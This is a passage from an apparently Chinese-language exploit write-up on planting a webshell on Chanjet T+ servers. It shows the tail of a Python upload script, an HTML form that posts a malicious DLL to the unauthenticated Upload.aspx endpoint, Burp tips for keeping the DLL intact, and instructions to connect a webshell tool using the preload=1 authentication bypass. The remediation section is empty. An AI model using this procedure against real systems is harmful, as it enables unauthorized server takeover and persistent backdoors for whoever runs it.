        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36'
    }

    upload_dll()

上传完成之后访问如下链接验证webshell:

http://192.168.199.134/tplus/load.aspx?preload=1

如果出现错误信息:文件“/tplus/load.aspx”不存在。则表示上传失败

image-20220914232936379
方法二:html表单上传

尝试构造本地HTML表单,burp拦截进行文件上传

dllupload.html

<form action="http://192.168.199.134/tplus/SM/SetupAccount/Upload.aspx?preload=1" method="post" enctype="multipart/form-data">
    <div><input type="file" name="File1"></div>
    <div><input type="submit" value="上传"></div>
</form>

发现compiled文件可以正常上传,但是dll文件上传后会无法连接,尝试访问shell地址,发现报如下错误信息。

image-20220914232640419

经过多次进行测试验证,最终找到问题根源。burp拦截上传dll请求时,需要将字体改为默认字体(consolas),不然保存的文件内容和源文件内容不一样。

image-20221016200502528

4、webshell链接

使用webshell工具链接上述地址

一定要加preload=1 这个。不然他还是走了验证的通道

image-20220914232828783

四、修复方案

参考链接

]]>